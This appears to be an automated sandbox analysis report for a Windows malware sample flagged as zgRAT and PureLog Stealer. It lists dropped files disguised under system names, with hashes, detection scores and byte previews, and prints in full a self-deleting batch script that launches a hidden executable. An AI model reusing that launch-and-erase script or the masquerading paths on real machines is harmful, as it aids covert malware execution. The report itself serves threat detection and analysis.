SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 79%, Browse
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4042529
Entropy (8bit):	7.700603596238004
Encrypted:	false
SSDEEP:	98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
MD5:	45C59202DCE8ED255B4DBD8BA74C630F
SHA1:	60872781ED51D9BC22A36943DA5F7BE42C304130
SHA-256:	D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
SHA-512:	FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61% Antivirus: Virustotal, Detection: 53%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\4e3ac3462c9605

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (306), with no line terminators
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.771332677552242
Encrypted:	false
SSDEEP:	6:+LFqg1dTqa306R+gBmekzQ0UINdYyhKOEqRkXUOWdYP5yPzTTH2yB:+5lsa3VRBBmv81INaqR856Hr
MD5:	E7792C04142D7E22E208EFE5B3DBF65D
SHA1:	5679BEAC26745C5AF2371A1D3430E1D5AC5083FC
SHA-256:	4C6D42E1315469EB6B6B949A2C5643DF1E2206BAF97E8A1764CBB8F514B95CF1
SHA-512:	C0598BC654D02BAEBA63E1E9AAB2D82A7FE50C4A3B25E5C3D5994CC0606EC60ACA3D2671C327EAC1700DF6B0707CE0962A22539A979C21E87F2FB6C0B33FB3B0
Malicious:	false
Reputation:	unknown
Preview:	4NInpJOzWiEaLMMMEa8pJ6JJuJEj7wtOcRLEbieogrRRF6Xlr3SQLHJ7D83fEp1kzz83BIug6UJbp2Exvd1EdcCVHNAdp8j1zrcP8dkjJwU17rSL4FulxxGXxmvxHQ07uSm8ayzR2S5qHLYa5yjkO7DCkEcVrwb26WGoFUvFPcte2ZPlOV2TrQtxOkXVWejG1CuvEtVkDeUvOjKLz0GW3ILpmTZf7asu2nnzodhfARPN68ipaLffYNMs1FIvT0nmvj2l6UgVTkVm27touuEv4MWpa48iVvLKonbWF7tFoJMx1k03Wd

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\87Bym0x4Fy.exe.log

Download File

Process:	C:\Users\user\Desktop\87Bym0x4Fy.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainComServermonitor.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:	0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:	666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:	0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:	4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cscript.exe.log

Download File

Process:	C:\Users\user\cscript.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ?\Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	696396
Entropy (8bit):	7.92487074127059
Encrypted:	false
SSDEEP:	12288:j2pAB7RdBZKHkW+Ylz5/uyOD5s74fR37jUoApZlFBfk1:CpAB9dB7Ov2ZD5ZfR3/4Zi1
MD5:	3FA15EFF861AFD187384FC8431CEA917
SHA1:	124726069F46976952024229FC8E2469420E591D
SHA-256:	E6650011EF561D7025D47F3E774B513C85FFEA9D41569DD09AEBD52A04204E93
SHA-512:	49A2C62ED0F956128F5143303FC81A33C87654626C35E0C7DA7E7E2AF998CDAD22D1DA097F8C164ADA465127A395B26E72F482B72937277715EAAFE41A85CEF7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]....}.2===OO?w..vw.....}...M..lLF."...F.8Gl....D."g.6...(....I... $0...........:.N..#.\|.<.SU_}Uk...[.....\|3..uMX.87+...{.z.-..F.....F.2..:.vn.{.s^oD.H_F=.W/..=-}g.P?kM...Z..b.@.vK...Q;..a.w.O.....SVmPj3WvD..buK.'.}[.w.....-}...[Q.m...]..}......*..I..W.E..^.Y......bW.e....}.......... ..^...D\...o.=.@...U.}.....3C.~...:...C...'[....'....G......A.KOT...5c...+.}_x.%......c.....}........<Gc..1..~..k,........C...=<.;o..x0..\..~..0f.C..?..D.'.....+.}@.c2..<..=..<.j....(...1...Z...../.s@.G.~2.U.X.P....}.-.b.>.P....c......'.q...............9...V.......7..P.k~..9/....D....X.O;v.EaB.....b..8.b....4.?.S.cnjm./^.6.8..s~..W..q..qn....ns..}...{.}c....3..#..P.......g...}....].`.....mm.{R..=.&......ki.1?>.....?v..R..bcv.........c`..]b\|.8.Q.o.....cr.M..iv".#.7-.c...{B..S..N.~#......}.;-.k...XK;~Z\.c.....V.1Sb..w....OLy.8.....g.c6.~m..B}.;S^m.;RL....bN...c.X....

C:\Users\user\AppData\Local\Temp\RES5269.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x708, 10 symbols, created Thu Aug 1 10:41:40 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1984
Entropy (8bit):	4.586247609902551
Encrypted:	false
SSDEEP:	24:HFK9AIO0/m+DfHJlfwKRfCWYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+e4:ZhkmkpKKJCWYyluOulajfqXSfbNtmhZZ
MD5:	4F6F19EF5EA2954E160556D260EE4AC1
SHA1:	DA138DB3B14DE5FB33198FAA4DD1460CDB92C900
SHA-256:	573AAE6C546FAD7531F98A6E00F7A8F8B6349C87001498457CF67572E5066D0D
SHA-512:	F13A71DCFB61885F232631AF6AA42324DEBE4D32F09D5790A0E6B5A09A78B698BFDBD3CA024827D60C6037685419964C2B04DFA20B18EF38C4F8DF13BEF1CAF2
Malicious:	false
Reputation:	unknown
Preview:	L...df.f.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES5269.tmp.-.<....................a..Microsoft (R) CVTRES.}.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.

C:\Users\user\AppData\Local\Temp\RES5528.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Aug 1 10:41:41 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.135473740012819
Encrypted:	false
SSDEEP:	24:Haq9s+fLg/4DfHpwK9GofVkNWI+ycuZhN2jakSnsPNnqS+d:fLg/2yKDVk41ul2ja3n8qSe
MD5:	26C09CA6F0BA23F398FF4049D0BE3F46
SHA1:	E8E56E8C77AE5C5F99661948A455430EF780065A
SHA-256:	FC09718EED9D93474F7C6A23FA1DB7F1CC201C39567166F54A4EA0F805C4CFE5
SHA-512:	CCD3DBFADD80503CCD86D1DAA883C4D0256B017E484B899A68C85B02CE64B38A7ADDF0E20D75A242FAB3E2A275CC1923F25E66360EA9B93441A2513D9557DEF4
Malicious:	false
Reputation:	unknown
Preview:	L...ef.f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP................K.?......u...R..........4.......C:\Users\user\AppData\Local\Temp\RES5528.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\S2fwvM0Wo8

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:80aKDM9:8bKDM9
MD5:	0BC5A75B1420A33596CD2EA3CC28932B
SHA1:	4304DF3E47BC569B2E5A7941699D45B500802B0B
SHA-256:	4EE7DD4433299B9CB1770BAAE9D3CB646A1B986DC0634868BE91F34021C393B7
SHA-512:	D3905CC8A6759FEB800B6C3BF71F9F6A928DE14FA7636492B4CB5E08A63F5C224ADE92BB953D97D979F3365D61C77920AA51EA60A11F0647B325ACFBFD69A248
Malicious:	false
Reputation:	unknown
Preview:	8nHYuMsSQtsJNQjNrP6WqexaU

C:\Users\user\AppData\Local\Temp\VbvGgiO8yC.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	178
Entropy (8bit):	5.317736277230626
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5SMLBV1QEUMKLVyBktKcKZG1t+kiE2J5xAIk:hCRLuVFOOr+DER5SMLFgMQVyKOZG1wkr
MD5:	2DA75F9F9CD1F62E5F99BF52375F01C4
SHA1:	297E009A3D6E81C4AC66D36F4DC39CE646ED7189
SHA-256:	BB15B6C3E4AE35589A40A334F3D7D390BF88A0FE43F0FCB883531824CFE7AFF5
SHA-512:	8F9C9A1BBA1FCD59EC6F30148090F87D0C3AD73CBFC04BF2A1ED0D1E3D2CFDFA12E0709EC5A59E6B32736882D58A0A5F920719A3626120D9E6EE71CCFC592641
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VbvGgiO8yC.bat"

C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17874291
Entropy (8bit):	7.9984186921086025
Encrypted:	true
SSDEEP:	393216:OoNLbkNjOUjUQaTv/5f3LIHr8NSpeLWKdAZxBzcPS4wvF:OohVBNvR3MHr4+KdCkwvF
MD5:	A4FE53D7F7F29D0065F8B589A7B61112
SHA1:	FF2527ABBDD8294CF93636AC2D5B6F1AEBB71546
SHA-256:	3216A09A28E0B5107BD6808F8490E73C4B1A4AD3A5C9AEF13FF211DFC4CE9181
SHA-512:	FADBE9B2A1851F8CA3AD26F9215F77BEFF7403A48F095E104D1C48A89900556C83DA11737930F225AE0A5E3B7CA48CAB37845249D3C9A2CB0EC3C1FBD6A05F76
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 51%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48920
Entropy (8bit):	7.80237293184675
Encrypted:	false
SSDEEP:	768:4AZgCxM2GXvgErzHwiVGP2lhBHgdcmQYnTYf9WeW/pAHILCVjew5YiSyv3YJPxWb:4A/MZJHzVGPwRHYTiWeWCHILCVjd7SyL
MD5:	FBA120A94A072459011133DA3A989DB2
SHA1:	6568B3E9E993C7E993A699505339BBEBB5DB6FB0
SHA-256:	055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
SHA-512:	221B5A2A9DE1133E2866B39F493A822060D3FB85F8C844C116F64878B9B112E8085E61D450053D859A63450D1292C13BD7EC38B89FE2DFA6684AC94E090EC3AA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109336
Entropy (8bit):	7.935778322595252
Encrypted:	false
SSDEEP:	3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
MD5:	7CDC590AC9B4FFA52C8223823B648E5C
SHA1:	C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
SHA-256:	F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
SHA-512:	919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36120
Entropy (8bit):	7.666263818459696
Encrypted:	false
SSDEEP:	768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
MD5:	659A5EFA39A45C204ADA71E1660A7226
SHA1:	1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
SHA-256:	B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
SHA-512:	386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.91873819228598
Encrypted:	false
SSDEEP:	1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
MD5:	864B22495372FA4D8B18E1C535962AE2
SHA1:	8CFAEE73B7690B9731303199E3ED187B1C046A85
SHA-256:	FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
SHA-512:	9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 4%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." ..... ...............................................................`.........................................4...L....................@.........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

